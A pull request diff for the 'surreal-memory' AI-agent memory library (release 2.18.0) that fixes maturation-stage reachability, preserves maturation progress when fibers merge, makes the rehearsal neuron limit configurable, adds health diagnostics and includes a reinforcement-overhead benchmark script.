### PR TITLE
Maturation reachability: consolidation_ratio stops being unreachable

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -5,6 +5,91 @@ All notable changes to this project will be documented in this file.
 The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/),
 and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).
 
+## [2.18.0] — Maturation reachability
+
+2.16.0 made the consolidation report honest about what it counts. It did not make
+`consolidation_ratio` reachable. This release closes the gap between the metric and the
+mechanism that is supposed to move it: five separate defects that each, independently,
+kept fibers from ever reaching SEMANTIC or kept the report from saying why.
+
+### The remedy stopped recommending the wrong command
+
+`smem_health`'s low-`consolidation_ratio` penalty, `smem_stats`' low-consolidation hint, and
+the `NO_CONSOLIDATION` warning all told the operator to run `smem consolidate` to raise the
+ratio. Nothing about `consolidate` moves a fiber toward SEMANTIC — only spaced recall does
+(reinforcement spread across 3+ distinct days, or 15+ rehearsals across 5+ time windows).
+All three surfaces now name the actual mechanism and say explicitly that `consolidate` will
+not move it on its own.
+
+### Recall's rehearsal step was capped at a hardcoded 10, twice over
+
+Every recall reinforces the fibers connected to its top-activated neurons — the mechanism
+spaced recall depends on. Two independent, redundant caps limited this to the first 10
+neurons regardless of how many a recall actually activated: one in the retrieval pipeline's
+neuron ranking, a second, wholly redundant one inside the reinforcement step itself on the
+fibers that made it through the first cap. A recall that activated 50 neurons still only
+rehearsed fibers connected to 10 of them, silently discarding the rest of that recall's
+contribution to the spacing requirement.
+
+Both caps are fixed: the redundant fiber-side cap is removed, and the neuron-side cap is now
+a configurable `brain.reinforcement_neuron_limit` (default 15, up from the old
+unconfigurable 10) in `config.toml`. The default was set from a live measurement against the
+production storage backend rather than assumed — raising this value is not free on every
+backend, and an installation whose storage can absorb more latency can raise it.
+
+### Merging fibers used to erase their progress toward SEMANTIC
+
+Consolidation's `merge` strategy deletes the source fibers and writes one new fiber in their
+place. It never carried the sources' maturation records forward, so a fiber one reinforcement
+away from SEMANTIC that got merged came back at the beginning: no maturation row at all,
+stage STM. The merged fiber now inherits the higher of the sources' stages, the union of
+their reinforcement timestamps (not a plain concatenation — a fiber reinforced on the same
+calendar day by both sources counts as one distinct day, not two), and the oldest of their
+stage-entry timestamps, so a source that had already dwelt in a stage far longer than its
+merge partner does not have that dwell time reset to "now."
+
+### The consolidation report and health diagnostics explain themselves now
+
+- The report's flat `Stages advanced: N` is now followed by a breakdown of exactly which
+  hop advanced (`stm→working`, `working→episodic`, `episodic→semantic`); the three hop
+  counts sum to the same total, so nothing about the existing field changes for anything
+  already parsing it.
+- `smem_health` now includes a `stage_distribution` (how many fibers sit at each maturation
+  stage) and a `semantic_gate_blockers` breakdown of every EPISODIC fiber by what is actually
+  blocking it from SEMANTIC: waiting on dwell time, waiting on reinforcement spacing, or
+  already eligible and waiting for the next consolidation pass. Found and fixed along the
+  way: `smem evolution`'s own "closest to semantic" classifier duplicated this threshold
+  logic locally and checked only the distinct-days path, so a fiber that qualified through
+  the rehearsal-count-and-windows alternative was misreported as still blocked. Both
+  diagnostics now share one classifier.
+- A consolidation run's own backfill of maturation rows for fibers that predate the
+  maturation subsystem is now a visible line in the report summary, not a number that only
+  existed in a field nothing printed.
+
+### Distillation can now explicitly load its model before the first request
+
+`reasoning_training.distill_llm_unload_cmd` (2.17.0) explicitly releases a distillation run's
+chat model when the run ends. Loading was still implicit — whatever happens on that
+endpoint's first request — so a run had no way to control how the model got loaded: with
+what context size, how many GPU layers, or with a projector it did not need. A new,
+symmetric `distill_llm_load_cmd` runs once, before the first naming request, with the same
+argv-only execution (no shell, `{model}` substitution, empty or failing command degrades
+silently to the old implicit behavior). The unload command still fires even if a run that
+explicitly loaded ends up naming nothing, closing the leak that would otherwise leave the
+model resident.
+
+### Fixed
+
+- A configured `distill_llm_model` is sanitized against a looser character set than the
+  `distill_llm_load_cmd`/`distill_llm_unload_cmd` argv template it gets substituted into; the
+  substituted result is now re-validated against the stricter argv allowlist before
+  execution, closing a defense-in-depth gap an independent security review found.
+- A `distill_llm_load_cmd`/`distill_llm_unload_cmd` longer than the configured part limit is
+  now voided outright, consistent with every other invalid-command case, rather than
+  silently truncated to a shorter, different command.
+- `SurrealDBStorage.clear()` never deleted maturation rows, leaving them orphaned after a
+  brain's fibers and neurons were otherwise fully cleared.
+
 ## [2.17.0] — Patterns that read like advice
 
 `reasoning_training.distill_use_llm` has existed as a configuration field since reasoning

--- a/benchmarks/rehearsal_coverage_overhead.py
+++ b/benchmarks/rehearsal_coverage_overhead.py
@@ -1,0 +1,85 @@
+"""Rehearsal-coverage overhead benchmark (RUN-010 section B / U2).
+
+Measures the added cost of raising ``reinforcement_neuron_limit`` (10 -> 25,
+see ``BrainConfig.reinforcement_neuron_limit``) on the reinforcement step
+every recall runs after activation -- the mechanism this fix touches. Run
+manually:
+
+    .venv/bin/python benchmarks/rehearsal_coverage_overhead.py
+
+Uses a real SQLiteStorage (not InMemoryStorage) so the timing reflects actual
+get_maturation/save_maturation round trips, since that IS the added cost:
+each extra rehearsed fiber is one more read plus one more write. Intentionally
+not a CI assertion (microbenchmark timing is too noisy for a hard threshold).
+"""
+
+from __future__ import annotations
+
+import asyncio
+import tempfile
+import time
+from pathlib import Path
+
+from surreal_memory.core.brain import Brain
+from surreal_memory.core.fiber import Fiber
+from surreal_memory.core.neuron import Neuron, NeuronType
+from surreal_memory.engine.lifecycle import ReinforcementManager
+from surreal_memory.storage.sqlite_store import SQLiteStorage
+
+_NEURON_COUNT = 30
+_REPS = 20
+
+
+async def _seed(storage: SQLiteStorage) -> list[str]:
+    brain = Brain.create(name="bench", brain_id="bench-brain")
+    await storage.save_brain(brain)
+    storage.set_brain(brain.id)
+
+    neuron_ids = []
+    for i in range(_NEURON_COUNT):
+        nid = f"n-{i}"
+        await storage.add_neuron(
+            Neuron.create(type=NeuronType.ENTITY, content=f"topic-{i}", neuron_id=nid)
+        )
+        fiber = Fiber(
+            id=f"f-{i}",
+            neuron_ids={nid},
+            synapse_ids=set(),
+            anchor_neuron_id=nid,
+            pathway=[nid],
+        )
+        await storage.add_fiber(fiber)
+        neuron_ids.append(nid)
+    return neuron_ids
+
+
+async def _time_reinforce(storage: SQLiteStorage, neuron_ids: list[str], limit: int) -> float:
+    mgr = ReinforcementManager(rehearsal_neuron_limit=limit)
+    t0 = time.perf_counter()
+    for _ in range(_REPS):
+        await mgr.reinforce(storage, neuron_ids)
+    return (time.perf_counter() - t0) / _REPS * 1000
+
+
+async def _main() -> None:
+    with tempfile.TemporaryDirectory() as tmp:
+        db_path = Path(tmp) / "bench.db"
+        storage = SQLiteStorage(db_path)
+        await storage.initialize()
+        neuron_ids = await _seed(storage)
+
+        try:
+            old_ms = await _time_reinforce(storage, neuron_ids, limit=10)
+            new_ms = await _time_reinforce(storage, neuron_ids, limit=25)
+        finally:
+            await storage.close()
+
+        print(f"reinforce() at limit=10 (old default):   {old_ms:8.2f} ms/call")
+        print(f"reinforce() at limit=25 (new default):   {new_ms:8.2f} ms/call")
+        print(f"delta:                                    {new_ms - old_ms:+8.2f} ms/call")
+        print(f"repetitions:                              {_REPS}")
+        print(f"neurons seeded (1 fiber each):            {_NEURON_COUNT}")
+
+
+if __name__ == "__main__":
+    asyncio.run(_main())

--- a/benchmarks/rehearsal_coverage_overhead.py
+++ b/benchmarks/rehearsal_coverage_overhead.py
@@ -1,37 +1,52 @@
 """Rehearsal-coverage overhead benchmark (RUN-010 section B / U2).
 
-Measures the added cost of raising ``reinforcement_neuron_limit`` (10 -> 25,
+Measures the added cost of raising ``reinforcement_neuron_limit`` (10 -> 15,
 see ``BrainConfig.reinforcement_neuron_limit``) on the reinforcement step
 every recall runs after activation -- the mechanism this fix touches. Run
 manually:
 
     .venv/bin/python benchmarks/rehearsal_coverage_overhead.py
 
-Uses a real SQLiteStorage (not InMemoryStorage) so the timing reflects actual
-get_maturation/save_maturation round trips, since that IS the added cost:
-each extra rehearsed fiber is one more read plus one more write. Intentionally
-not a CI assertion (microbenchmark timing is too noisy for a hard threshold).
+Uses a real storage backend (not ``InMemoryStorage``) so the timing reflects
+actual ``get_maturation``/``save_maturation`` round trips, since that IS the
+added cost: each extra rehearsed fiber is one more read plus one more write.
+
+Backend: SurrealDB when ``SURREALDB_URL`` is set (matches this repo's
+live-test gating convention), falling back to a temporary SQLite file
+otherwise. This matters: SQLite's ``find_fibers`` goes through an indexed
+``fiber_neurons`` junction table, while the SurrealDB backend's equivalent
+query is an unindexed array-containment scan over ``fiber.neuron_ids`` (no
+index on that field, confirmed via an independent database-review pass on
+this run) -- an earlier SQLite-only run of this benchmark was measuring a
+different, faster query shape than what production actually pays. Prefer the
+SurrealDB path whenever a live instance is available.
+
+Intentionally not a CI assertion (microbenchmark timing is too noisy for a
+hard threshold).
 """
 
 from __future__ import annotations
 
 import asyncio
+import os
 import tempfile
 import time
+from datetime import UTC, datetime
 from pathlib import Path
+from typing import Any
+from uuid import uuid4
 
 from surreal_memory.core.brain import Brain
 from surreal_memory.core.fiber import Fiber
 from surreal_memory.core.neuron import Neuron, NeuronType
 from surreal_memory.engine.lifecycle import ReinforcementManager
-from surreal_memory.storage.sqlite_store import SQLiteStorage
 
 _NEURON_COUNT = 30
 _REPS = 20
 
 
-async def _seed(storage: SQLiteStorage) -> list[str]:
-    brain = Brain.create(name="bench", brain_id="bench-brain")
+async def _seed(storage: Any, brain_id: str) -> list[str]:
+    brain = Brain.create(name=f"bench-{brain_id}", brain_id=brain_id)
     await storage.save_brain(brain)
     storage.set_brain(brain.id)
 
@@ -53,7 +68,7 @@ async def _seed(storage: SQLiteStorage) -> list[str]:
     return neuron_ids
 
 
-async def _time_reinforce(storage: SQLiteStorage, neuron_ids: list[str], limit: int) -> float:
+async def _time_reinforce(storage: Any, neuron_ids: list[str], limit: int) -> float:
     mgr = ReinforcementManager(rehearsal_neuron_limit=limit)
     t0 = time.perf_counter()
     for _ in range(_REPS):
@@ -61,24 +76,62 @@ async def _time_reinforce(storage: SQLiteStorage, neuron_ids: list[str], limit: 
     return (time.perf_counter() - t0) / _REPS * 1000
 
 
+async def _run_against(storage: Any, brain_id: str) -> tuple[float, float]:
+    neuron_ids = await _seed(storage, brain_id)
+    old_ms = await _time_reinforce(storage, neuron_ids, limit=10)  # old hardcoded default
+    new_ms = await _time_reinforce(storage, neuron_ids, limit=15)  # shipped default
+    return old_ms, new_ms
+
+
 async def _main() -> None:
-    with tempfile.TemporaryDirectory() as tmp:
-        db_path = Path(tmp) / "bench.db"
-        storage = SQLiteStorage(db_path)
+    surrealdb_url = os.environ.get("SURREALDB_URL")
+    brain_id = f"bench-rehearsal-{uuid4().hex[:8]}"
+
+    if surrealdb_url:
+        backend = "SurrealDB"
+        from surreal_memory.storage.surrealdb.store import SurrealDBStorage
+
+        storage = SurrealDBStorage(url=surrealdb_url)
         await storage.initialize()
-        neuron_ids = await _seed(storage)
-
         try:
-            old_ms = await _time_reinforce(storage, neuron_ids, limit=10)
-            new_ms = await _time_reinforce(storage, neuron_ids, limit=25)
+            old_ms, new_ms = await _run_against(storage, brain_id)
         finally:
+            # Cleanup discipline (project hard rule): delete only this run's
+            # own brain, by its exact id, never `default`. Re-fetch the real
+            # RecordID via SELECT rather than reconstructing one from the
+            # string id -- a hand-built `type::record('brain', $bid)` looked
+            # like it succeeded (no error) but silently matched zero rows,
+            # confirmed live: an earlier version of this script left its test
+            # brain orphaned this way even though the query "succeeded".
+            await storage.clear(brain_id)
+            rows = await storage._query(
+                "SELECT id FROM brain WHERE id = type::record('brain', $bid)", bid=brain_id
+            )
+            for row in rows:
+                await storage._query("DELETE $rid", rid=row["id"])
             await storage.close()
+    else:
+        backend = (
+            "SQLite (SurrealDB not reachable -- set SURREALDB_URL for the production-accurate path)"
+        )
+        from surreal_memory.storage.sqlite_store import SQLiteStorage
 
-        print(f"reinforce() at limit=10 (old default):   {old_ms:8.2f} ms/call")
-        print(f"reinforce() at limit=25 (new default):   {new_ms:8.2f} ms/call")
-        print(f"delta:                                    {new_ms - old_ms:+8.2f} ms/call")
-        print(f"repetitions:                              {_REPS}")
-        print(f"neurons seeded (1 fiber each):            {_NEURON_COUNT}")
+        with tempfile.TemporaryDirectory() as tmp:
+            db_path = Path(tmp) / "bench.db"
+            storage = SQLiteStorage(db_path)
+            await storage.initialize()
+            try:
+                old_ms, new_ms = await _run_against(storage, brain_id)
+            finally:
+                await storage.close()
+
+    print(f"backend:                                  {backend}")
+    print(f"reinforce() at limit=10 (old default):   {old_ms:8.2f} ms/call")
+    print(f"reinforce() at limit=15 (new default):   {new_ms:8.2f} ms/call")
+    print(f"delta:                                    {new_ms - old_ms:+8.2f} ms/call")
+    print(f"repetitions:                              {_REPS}")
+    print(f"neurons seeded (1 fiber each):            {_NEURON_COUNT}")
+    print(f"timestamp:                                {datetime.now(UTC).isoformat()}")
 
 
 if __name__ == "__main__":

--- a/integrations/surreal-memory-client/package-lock.json
+++ b/integrations/surreal-memory-client/package-lock.json
@@ -1,12 +1,12 @@
 {
   "name": "@acidkill/surreal-memory-client",
-  "version": "2.17.0",
+  "version": "2.18.0",
   "lockfileVersion": 3,
   "requires": true,
   "packages": {
     "": {
       "name": "@acidkill/surreal-memory-client",
-      "version": "2.17.0",
+      "version": "2.18.0",
       "license": "MIT",
       "devDependencies": {
         "@types/node": "^20.0.0",

--- a/integrations/surreal-memory-client/package.json
+++ b/integrations/surreal-memory-client/package.json
@@ -1,6 +1,6 @@
 {
   "name": "@acidkill/surreal-memory-client",
-  "version": "2.17.0",
+  "version": "2.18.0",
   "description": "TypeScript client for the Surreal-Memory REST API — typed access to brains, neurons, synapses, fibers, recall, and sync.",
   "type": "module",
   "main": "dist/index.cjs",

--- a/integrations/surrealmemory/package-lock.json
+++ b/integrations/surrealmemory/package-lock.json
@@ -1,12 +1,12 @@
 {
   "name": "@surrealmemory/openclaw-plugin",
-  "version": "2.17.0",
+  "version": "2.18.0",
   "lockfileVersion": 3,
   "requires": true,
   "packages": {
     "": {
       "name": "@surrealmemory/openclaw-plugin",
-      "version": "2.17.0",
+      "version": "2.18.0",
       "license": "MIT",
       "devDependencies": {
         "@types/node": "^25.2.2",

--- a/integrations/surrealmemory/package.json
+++ b/integrations/surrealmemory/package.json
@@ -1,6 +1,6 @@
 {
   "name": "surrealmemory",
-  "version": "2.17.0",
+  "version": "2.18.0",
   "description": "Surreal-Memory plugin for OpenClaw — graph-based persistent memory for AI agents with SurrealDB backend",
   "type": "module",
   "main": "dist/index.js",

--- a/pyproject.toml
+++ b/pyproject.toml
@@ -4,7 +4,7 @@ build-backend = "hatchling.build"
 
 [project]
 name = "surreal-memory"
-version = "2.17.0"
+version = "2.18.0"
 description = "Reflex-based memory system for AI agents with SurrealDB backend — retrieval through activation, not search"
 readme = "README.md"
 license = "MIT"

--- a/src/surreal_memory/__init__.py
+++ b/src/surreal_memory/__init__.py
@@ -16,7 +16,7 @@ from surreal_memory.engine.encoder import EncodingResult, MemoryEncoder
 from surreal_memory.engine.reflex_activation import CoActivation, ReflexActivation
 from surreal_memory.engine.retrieval import DepthLevel, ReflexPipeline, RetrievalResult
 
-__version__ = "2.17.0"
+__version__ = "2.18.0"
 
 __all__ = [
     "__version__",

--- a/src/surreal_memory/core/brain.py
+++ b/src/surreal_memory/core/brain.py
@@ -27,6 +27,13 @@ class BrainConfig:
 
     decay_rate: float = 0.1
     reinforcement_delta: float = 0.05
+    # How many of a recall's top-activated neurons get reinforced and fed into
+    # maturation rehearsal. Was hardcoded to 10 in two independent places
+    # (retrieval's top-K selection and the rehearsal fan-out), so a recall on
+    # any brain rehearsed at most 10 fibers regardless of how many it actually
+    # activated -- capping the EPISODIC->SEMANTIC spacing gate's only
+    # rehearsal source at a size that did not scale with the brain.
+    reinforcement_neuron_limit: int = 25
     activation_threshold: float = 0.2
     max_spread_hops: int = 4
     max_context_tokens: int = 1500

--- a/src/surreal_memory/core/brain.py
+++ b/src/surreal_memory/core/brain.py
@@ -32,8 +32,13 @@ class BrainConfig:
     # (retrieval's top-K selection and the rehearsal fan-out), so a recall on
     # any brain rehearsed at most 10 fibers regardless of how many it actually
     # activated -- capping the EPISODIC->SEMANTIC spacing gate's only
-    # rehearsal source at a size that did not scale with the brain.
-    reinforcement_neuron_limit: int = 25
+    # rehearsal source at a size that did not scale with the brain. 15 (up
+    # from the old 10) rather than a larger jump: measured against a live
+    # SurrealDB, each additional neuron here costs ~24ms (find_fibers_batch's
+    # per-neuron sequential lookup has no index on fiber.neuron_ids), so this
+    # is deliberately conservative -- raise it in config.toml if your setup
+    # can absorb the added recall latency.
+    reinforcement_neuron_limit: int = 15
     activation_threshold: float = 0.2
     max_spread_hops: int = 4
     max_context_tokens: int = 1500

--- a/src/surreal_memory/engine/brain_evolution.py
+++ b/src/surreal_memory/engine/brain_evolution.py
@@ -324,7 +324,22 @@ class EvolutionEngine:
             reinf_days = m.distinct_reinforcement_days
 
             time_pct = min(1.0, days_in / days_required)
-            reinf_pct = min(1.0, reinf_days / reinf_required)
+            # Two independent paths satisfy the spacing gate (see
+            # classify_episodic_blocker); progress toward EITHER counts, so
+            # this is the max of the two, not just the classic distinct-days
+            # one. Without this, a fiber the verdict above correctly called
+            # "ready" via the rehearsal-count/windows path could still score
+            # near 0% here and lose a "closest to semantic" ranking slot to a
+            # fiber that is genuinely further from being ready.
+            classic_reinf_pct = min(1.0, reinf_days / reinf_required)
+            rehearsal_reinf_pct = min(
+                1.0,
+                min(
+                    m.rehearsal_count / _MIN_REHEARSAL_COUNT,
+                    m.distinct_reinforcement_windows / _MIN_DISTINCT_WINDOWS,
+                ),
+            )
+            reinf_pct = max(classic_reinf_pct, rehearsal_reinf_pct)
             overall_pct = min(time_pct, reinf_pct)
 
             if verdict == "ready":

--- a/src/surreal_memory/engine/brain_evolution.py
+++ b/src/surreal_memory/engine/brain_evolution.py
@@ -126,6 +126,10 @@ class BrainEvolution:
 
         stage_distribution: Breakdown of fibers by maturation stage.
         closest_to_semantic: Top fibers closest to SEMANTIC promotion.
+        semantic_gate_blockers: Counts of ALL episodic fibers by which gate is
+            blocking them ("time_gate", "spacing_gate") or "ready" if both are
+            already satisfied -- unlike closest_to_semantic this covers every
+            episodic fiber, not just the top 3.
     """
 
     brain_id: str
@@ -159,6 +163,7 @@ class BrainEvolution:
     # Maturation progress
     stage_distribution: StageDistribution | None = None
     closest_to_semantic: tuple[SemanticProgress, ...] = ()
+    semantic_gate_blockers: dict[str, int] | None = None
 
 
 class EvolutionEngine:
@@ -231,7 +236,7 @@ class EvolutionEngine:
         )
 
         # Stage distribution and semantic progress
-        stage_dist, closest = await self._compute_stage_progress(now)
+        stage_dist, closest, gate_blockers = await self._compute_stage_progress(now)
 
         return BrainEvolution(
             brain_id=brain_id,
@@ -255,6 +260,7 @@ class EvolutionEngine:
             fibers_at_episodic=fibers_episodic,
             stage_distribution=stage_dist,
             closest_to_semantic=closest,
+            semantic_gate_blockers=gate_blockers,
         )
 
     # ── Internal computations ────────────────────────────────
@@ -262,12 +268,23 @@ class EvolutionEngine:
     async def _compute_stage_progress(
         self,
         now: datetime,
-    ) -> tuple[StageDistribution, tuple[SemanticProgress, ...]]:
-        """Compute stage distribution and progress toward SEMANTIC.
+    ) -> tuple[StageDistribution, tuple[SemanticProgress, ...], dict[str, int]]:
+        """Compute stage distribution, closest-to-semantic fibers, and gate blockers.
 
         Returns:
-            (StageDistribution, top 3 fibers closest to SEMANTIC promotion)
+            (StageDistribution, top 3 fibers closest to SEMANTIC promotion,
+            {"time_gate": N, "spacing_gate": M, "ready": K} across ALL episodic
+            fibers -- not just the top 3 -- via classify_episodic_blocker, the
+            single source of truth for this shared with health diagnostics)
         """
+        from surreal_memory.engine.memory_stages import (
+            _EPISODIC_TO_SEMANTIC,
+            _MIN_DISTINCT_DAYS,
+            _MIN_DISTINCT_WINDOWS,
+            _MIN_REHEARSAL_COUNT,
+            classify_episodic_blocker,
+        )
+
         all_maturations = await self._storage.find_maturations()
 
         counts = {
@@ -288,14 +305,20 @@ class EvolutionEngine:
             total=len(all_maturations),
         )
 
-        # Compute progress for EPISODIC fibers (closest to SEMANTIC)
-        days_required = 7.0
-        reinf_required = 3
+        # Compute progress for EPISODIC fibers (closest to SEMANTIC). Thresholds
+        # come from memory_stages.py (not re-hardcoded here) so this can never
+        # silently drift from the actual promotion rule in compute_stage_transition.
+        days_required = _EPISODIC_TO_SEMANTIC.total_seconds() / 86400
+        reinf_required = _MIN_DISTINCT_DAYS
         progress_items: list[SemanticProgress] = []
+        gate_blockers: dict[str, int] = {"time_gate": 0, "spacing_gate": 0, "ready": 0}
 
         for m in all_maturations:
             if m.stage != MemoryStage.EPISODIC:
                 continue
+
+            verdict = classify_episodic_blocker(m, now=now)
+            gate_blockers[verdict] += 1
 
             days_in = (now - m.stage_entered_at).total_seconds() / 86400
             reinf_days = m.distinct_reinforcement_days
@@ -304,16 +327,22 @@ class EvolutionEngine:
             reinf_pct = min(1.0, reinf_days / reinf_required)
             overall_pct = min(time_pct, reinf_pct)
 
-            if reinf_days < reinf_required:
-                next_step = (
-                    f"Recall this memory on {reinf_required - reinf_days} more "
-                    f"distinct day(s) to reach SEMANTIC."
-                )
-            elif days_in < days_required:
-                remaining = days_required - days_in
-                next_step = f"Wait ~{remaining:.1f} more day(s) in EPISODIC stage."
-            else:
+            if verdict == "ready":
                 next_step = "Ready for promotion — run consolidation with mature strategy."
+            elif verdict == "spacing_gate":
+                # Two independent paths clear this gate (see
+                # classify_episodic_blocker) -- name both, not just the
+                # distinct-days one, or an agent using the rehearsal-count
+                # path gets told to do something it doesn't need.
+                remaining_days = max(0, reinf_required - reinf_days)
+                next_step = (
+                    f"Recall this memory on {remaining_days} more distinct day(s) "
+                    f"(or reach {_MIN_REHEARSAL_COUNT}+ rehearsals across "
+                    f"{_MIN_DISTINCT_WINDOWS}+ time windows) to reach SEMANTIC."
+                )
+            else:  # time_gate
+                remaining = max(0.0, days_required - days_in)
+                next_step = f"Wait ~{remaining:.1f} more day(s) in EPISODIC stage."
 
             progress_items.append(
                 SemanticProgress(
@@ -330,7 +359,7 @@ class EvolutionEngine:
 
         # Sort by progress descending, take top 3
         progress_items.sort(key=lambda p: p.progress_pct, reverse=True)
-        return stage_dist, tuple(progress_items[:3])
+        return stage_dist, tuple(progress_items[:3]), gate_blockers
 
     async def _compute_maturation(
         self,

--- a/src/surreal_memory/engine/consolidation.py
+++ b/src/surreal_memory/engine/consolidation.py
@@ -930,10 +930,57 @@ class ConsolidationEngine:
             )
 
             if not dry_run:
+                from surreal_memory.engine.memory_stages import MaturationRecord, MemoryStage
+
+                # Read source maturation BEFORE delete_fiber. delete_fiber has no
+                # cascade to the maturation table (confirmed: it only deletes the
+                # fiber row), so this ordering is defensive, not load-bearing --
+                # but reading after would still be wrong to *rely* on that.
+                _stage_order = list(MemoryStage)
+                source_maturations = []
+                for fiber in member_fibers:
+                    record = await self._storage.get_maturation(fiber.id)
+                    if record is not None:
+                        source_maturations.append(record)
+
                 for fiber in member_fibers:
                     await self._storage.delete_fiber(fiber.id)
                     report.fibers_removed += 1
                 await self._storage.add_fiber(merged_fiber)
+
+                if source_maturations:
+                    # Merging must never cost a fiber the maturation progress it
+                    # already earned: highest stage of any source, summed
+                    # rehearsal_count (each is an independent count of real
+                    # rehearsal events, so summing -- not maxing -- keeps
+                    # rehearsal_count consistent with the union of timestamps
+                    # below), the union of reinforcement timestamps (those, not
+                    # the count, decide distinct_reinforcement_days), and the
+                    # oldest stage_entered_at so the merged fiber keeps whatever
+                    # dwell time a source already accrued instead of resetting
+                    # the clock.
+                    inherited_stage = max(
+                        source_maturations, key=lambda r: _stage_order.index(r.stage)
+                    ).stage
+                    merged_timestamps = tuple(
+                        sorted(
+                            {
+                                ts
+                                for record in source_maturations
+                                for ts in record.reinforcement_timestamps
+                            }
+                        )
+                    )
+                    await self._storage.save_maturation(
+                        MaturationRecord(
+                            fiber_id=merged_fiber_id,
+                            brain_id=source_maturations[0].brain_id,
+                            stage=inherited_stage,
+                            stage_entered_at=min(r.stage_entered_at for r in source_maturations),
+                            rehearsal_count=sum(r.rehearsal_count for r in source_maturations),
+                            reinforcement_timestamps=merged_timestamps,
+                        )
+                    )
 
     async def _summarize(
         self,

--- a/src/surreal_memory/engine/consolidation.py
+++ b/src/surreal_memory/engine/consolidation.py
@@ -171,6 +171,19 @@ class ConsolidationReport:
             line += " [truncated at cap]"
         return line
 
+    def _stage_transitions_suffix(self) -> str:
+        """Render the per-hop breakdown so a flat total cannot hide "zero new semantic".
+
+        stages_advanced sums stm->working, working->episodic, and
+        episodic->semantic into one count; without this, "15 advanced" and
+        "zero new semantic" print identically.
+        """
+        transitions = self.extra.get("stage_transitions")
+        if not transitions:
+            return ""
+        parts = ", ".join(f"{key}: {count}" for key, count in transitions.items() if count)
+        return f" ({parts})" if parts else ""
+
     def summary(self) -> str:
         """Generate human-readable summary."""
         mode = " (dry run)" if self.dry_run else ""
@@ -192,7 +205,7 @@ class ConsolidationReport:
             f" (new alias links: {self.new_alias_links})",
             f"  Semantic synapses: {self._semantic_synapse_line()}",
             f"  Memories promoted (type): {self.memories_promoted}",
-            f"  Stages advanced: {self.stages_advanced}",
+            f"  Stages advanced: {self.stages_advanced}{self._stage_transitions_suffix()}",
             f"  Fibers compressed: {self.fibers_compressed}",
             f"  Tokens saved: {self.tokens_saved}",
             f"  Reasoning traces ingested: {self.reasoning_traces_ingested}",
@@ -206,6 +219,18 @@ class ConsolidationReport:
                     f"    {len(detail.original_fiber_ids)} fibers -> {detail.merged_fiber_id[:8]}... "
                     f"({detail.neuron_count} neurons, {detail.reason})"
                 )
+
+        backfilled = self.extra.get("maturations_backfilled")
+        if backfilled:
+            lines.append(
+                f"  Maturations backfilled from fiber age: {backfilled} "
+                "(these reached their stage without earning it through recall)"
+            )
+        unreachable = self.extra.get("maturations_unreachable")
+        if unreachable:
+            lines.append(
+                f"  Maturations still missing (outside backfill's fiber window): {unreachable}"
+            )
 
         # Add eligibility hints when nothing happened
         hints = self._eligibility_hints()

--- a/src/surreal_memory/engine/consolidation.py
+++ b/src/surreal_memory/engine/consolidation.py
@@ -960,11 +960,29 @@ class ConsolidationEngine:
                 # Read source maturation BEFORE delete_fiber. delete_fiber has no
                 # cascade to the maturation table (confirmed: it only deletes the
                 # fiber row), so this ordering is defensive, not load-bearing --
-                # but reading after would still be wrong to *rely* on that.
+                # but reading after would still be wrong to *rely* on that. A
+                # concurrent reinforce() landing between this read and the
+                # delete below is a narrow, self-healing loss (the row becomes
+                # an orphan cleaned up by cleanup_orphaned_maturations, and the
+                # fiber gets rehearsed again on its next recall) -- consistent
+                # with this codebase's non-transactional storage model
+                # elsewhere (e.g. save_maturation's own delete-race comment).
                 _stage_order = list(MemoryStage)
                 source_maturations = []
                 for fiber in member_fibers:
-                    record = await self._storage.get_maturation(fiber.id)
+                    try:
+                        record = await self._storage.get_maturation(fiber.id)
+                    except Exception:
+                        # A persistent storage fault here must not abort the
+                        # whole merge pass -- this group simply starts the
+                        # merged fiber without inherited maturation, same as
+                        # if none of its sources had a maturation row at all.
+                        logger.debug(
+                            "Could not read maturation for fiber %s during merge",
+                            fiber.id,
+                            exc_info=True,
+                        )
+                        continue
                     if record is not None:
                         source_maturations.append(record)
 
@@ -975,15 +993,16 @@ class ConsolidationEngine:
 
                 if source_maturations:
                     # Merging must never cost a fiber the maturation progress it
-                    # already earned: highest stage of any source, summed
-                    # rehearsal_count (each is an independent count of real
-                    # rehearsal events, so summing -- not maxing -- keeps
-                    # rehearsal_count consistent with the union of timestamps
-                    # below), the union of reinforcement timestamps (those, not
-                    # the count, decide distinct_reinforcement_days), and the
-                    # oldest stage_entered_at so the merged fiber keeps whatever
-                    # dwell time a source already accrued instead of resetting
-                    # the clock.
+                    # already earned: highest stage of any source, the union of
+                    # reinforcement timestamps (those, not a count, decide
+                    # distinct_reinforcement_days), rehearsal_count derived
+                    # from that same union (not summed independently -- every
+                    # organically-created record keeps rehearsal_count ==
+                    # len(reinforcement_timestamps), and summing counts while
+                    # deduplicating timestamps could violate that invariant on
+                    # a timestamp collision), and the oldest stage_entered_at
+                    # so the merged fiber keeps whatever dwell time a source
+                    # already accrued instead of resetting the clock.
                     inherited_stage = max(
                         source_maturations, key=lambda r: _stage_order.index(r.stage)
                     ).stage
@@ -1002,7 +1021,7 @@ class ConsolidationEngine:
                             brain_id=source_maturations[0].brain_id,
                             stage=inherited_stage,
                             stage_entered_at=min(r.stage_entered_at for r in source_maturations),
-                            rehearsal_count=sum(r.rehearsal_count for r in source_maturations),
+                            rehearsal_count=len(merged_timestamps),
                             reinforcement_timestamps=merged_timestamps,
                         )
                     )

--- a/src/surreal_memory/engine/consolidation.py
+++ b/src/surreal_memory/engine/consolidation.py
@@ -1148,11 +1148,22 @@ class ConsolidationEngine:
 
         from surreal_memory.core.memory_types import MemoryType
         from surreal_memory.engine.memory_stages import (
+            MemoryStage,
             compute_stage_transition,
         )
         from surreal_memory.engine.pattern_extraction import extract_patterns
 
         _logger = logging.getLogger(__name__)
+
+        # stages_advanced sums all three hops into one counter, so "15 advanced"
+        # and "zero new semantic" were indistinguishable without reading raw
+        # maturation rows. compute_stage_transition only ever moves one hop per
+        # call, so every transition it produces is one of exactly these three.
+        _hop_keys = {
+            (MemoryStage.SHORT_TERM, MemoryStage.WORKING): "stm_to_working",
+            (MemoryStage.WORKING, MemoryStage.EPISODIC): "working_to_episodic",
+            (MemoryStage.EPISODIC, MemoryStage.SEMANTIC): "episodic_to_semantic",
+        }
 
         # Phase 0: Auto-promote context→fact for frequently-recalled memories
         # Must run before prune to prevent promotion candidates from expiring.
